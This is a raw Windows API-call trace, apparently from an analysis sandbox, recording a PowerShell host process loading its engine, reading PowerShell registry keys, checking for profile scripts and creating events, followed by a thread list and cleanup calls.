	[0425.148] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.149] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.150] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.150] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.151] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.152] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.153] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.154] VirtualQuery (in: lpAddress=0xcb710, lpBuffer=0xcc5d0, dwLength=0x30 | out: lpBuffer=0xcc5d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.156] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.156] CoTaskMemFree (pv=0x1ede80) 
	[0425.160] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.161] CoTaskMemFree (pv=0x1ede80) 
	[0425.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.492] VirtualQuery (in: lpAddress=0xcb9c0, lpBuffer=0xcc880, dwLength=0x30 | out: lpBuffer=0xcc880*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0425.748] VirtualQuery (in: lpAddress=0xcb9c0, lpBuffer=0xcc880, dwLength=0x30 | out: lpBuffer=0xcc880*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.748] VirtualQuery (in: lpAddress=0xcb210, lpBuffer=0xcc0d0, dwLength=0x30 | out: lpBuffer=0xcc0d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.748] VirtualQuery (in: lpAddress=0xcb210, lpBuffer=0xcc0d0, dwLength=0x30 | out: lpBuffer=0xcc0d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd818 | out: phkResult=0xcd818*=0x334) returned 0x0
	[0425.749] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd79c, lpData=0x0, lpcbData=0xcd798*=0x0 | out: lpType=0xcd79c*=0x1, lpData=0x0, lpcbData=0xcd798*=0x56) returned 0x0
	[0425.749] CoTaskMemAlloc (cb=0x5a) returned 0x1aa5d0
	[0425.749] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd76c, lpData=0x1aa5d0, lpcbData=0xcd768*=0x56 | out: lpType=0xcd76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd768*=0x56) returned 0x0
	[0425.749] CoTaskMemFree (pv=0x1aa5d0) 
	[0425.749] RegCloseKey (hKey=0x334) returned 0x0
	[0425.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd818 | out: phkResult=0xcd818*=0x334) returned 0x0
	[0425.749] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd79c, lpData=0x0, lpcbData=0xcd798*=0x0 | out: lpType=0xcd79c*=0x1, lpData=0x0, lpcbData=0xcd798*=0x56) returned 0x0
	[0425.749] CoTaskMemAlloc (cb=0x5a) returned 0x1aa5d0
	[0425.749] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd76c, lpData=0x1aa5d0, lpcbData=0xcd768*=0x56 | out: lpType=0xcd76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd768*=0x56) returned 0x0
	[0425.749] CoTaskMemFree (pv=0x1aa5d0) 
	[0425.750] RegCloseKey (hKey=0x334) returned 0x0
	[0425.750] CoTaskMemAlloc (cb=0x20c) returned 0x1b768580
	[0425.750] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b768580 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0425.750] CoTaskMemFree (pv=0x1b768580) 
	[0425.750] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0425.750] CoTaskMemAlloc (cb=0x20c) returned 0x1b768580
	[0425.750] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b768580 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0425.750] CoTaskMemFree (pv=0x1b768580) 
	[0425.750] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0425.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0425.751] SetErrorMode (uMode=0x1) returned 0x1
	[0425.751] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd780 | out: lpFileInformation=0xcd780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.751] SetErrorMode (uMode=0x1) returned 0x1
	[0425.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0425.751] SetErrorMode (uMode=0x1) returned 0x1
	[0425.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd780 | out: lpFileInformation=0xcd780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.752] SetErrorMode (uMode=0x1) returned 0x1
	[0425.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0425.752] SetErrorMode (uMode=0x1) returned 0x1
	[0425.752] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd780 | out: lpFileInformation=0xcd780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.752] SetErrorMode (uMode=0x1) returned 0x1
	[0425.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0425.752] SetErrorMode (uMode=0x1) returned 0x1
	[0425.752] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xcd780 | out: lpFileInformation=0xcd780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.752] SetErrorMode (uMode=0x1) returned 0x1
	[0425.753] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.753] CoTaskMemFree (pv=0x1ede80) 
	[0425.753] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.754] CoTaskMemFree (pv=0x1ede80) 
	[0425.755] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.755] CoTaskMemFree (pv=0x1ede80) 
	[0425.758] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.758] CoTaskMemFree (pv=0x1ede80) 
	[0425.762] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.762] CoTaskMemFree (pv=0x1ede80) 
	[0425.763] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x334
	[0425.763] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0425.763] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x1c4
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0425.764] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0425.766] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.766] CoTaskMemFree (pv=0x1ede80) 
	[0425.768] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0425.769] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xcd960 | out: lpMode=0xcd960) returned 1
	[0425.770] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.770] CoTaskMemFree (pv=0x1ede80) 
	[0425.774] SetEvent (hEvent=0x2fc) returned 1
	[0425.774] SetEvent (hEvent=0x334) returned 1
	[0425.774] SetEvent (hEvent=0x338) returned 1
	[0425.774] SetEvent (hEvent=0x33c) returned 1
	[0425.774] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0425.776] CoTaskMemAlloc (cb=0x104) returned 0x1ede80
	[0425.776] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ede80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.776] CoTaskMemFree (pv=0x1ede80) 
	[0425.776] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd6b8 | out: phkResult=0xcd6b8*=0x354) returned 0x0
	[0425.776] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xcd63c, lpData=0x0, lpcbData=0xcd638*=0x0 | out: lpType=0xcd63c*=0x0, lpData=0x0, lpcbData=0xcd638*=0x0) returned 0x2

Thread:
	id = 208
	os_tid = 0xc10


Thread:
	id = 235
	os_tid = 0xcd0


Thread:
	id = 482
	os_tid = 0x11d0


Thread:
	id = 483
	os_tid = 0x11e4


Thread:
	id = 488
	os_tid = 0x1200


Thread:
	id = 493
	os_tid = 0x1230


Thread:
	id = 497
	os_tid = 0x1248

	[0377.730] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0406.664] LocalFree (hMem=0x1572c0) returned 0x0
	[0406.665] CloseHandle (hObject=0x318) returned 1
	[0406.665] CloseHandle (hObject=0x13) returned 1
	[0406.665] CloseHandle (hObject=0xf) returned 1
	[0406.666] RegCloseKey (hKey=0x304) returned 0x0
	[0406.666] RegCloseKey (hKey=0x300) returned 0x0
	[0406.666] RegCloseKey (hKey=0x2fc) returned 0x0
	[0406.666] LocalFree (hMem=0x157290) returned 0x0
	[0406.666] RegCloseKey (hKey=0x328) returned 0x0
	[0411.201] RegCloseKey (hKey=0x328) returned 0x0
	[0415.247] RegCloseKey (hKey=0x1c8) returned 0x0
	[0415.248] RegCloseKey (hKey=0x318) returned 0x0
	[0415.248] RegCloseKey (hKey=0x304) returned 0x0
	[0415.248] RegCloseKey (hKey=0x328) returned 0x0
	[0415.248] RegCloseKey (hKey=0x2fc) returned 0x0
	[0415.248] RegCloseKey (hKey=0x33c) returned 0x0
	[0415.249] RegCloseKey (hKey=0x338) returned 0x0
	[0415.249] RegCloseKey (hKey=0x334) returned 0x0
	[0415.249] RegCloseKey (hKey=0x330) returned 0x0
	[0415.249] RegCloseKey (hKey=0x1c4) returned 0x0
	[0422.312] RegCloseKey (hKey=0x374) returned 0x0
	[0422.313] RegCloseKey (hKey=0x370) returned 0x0
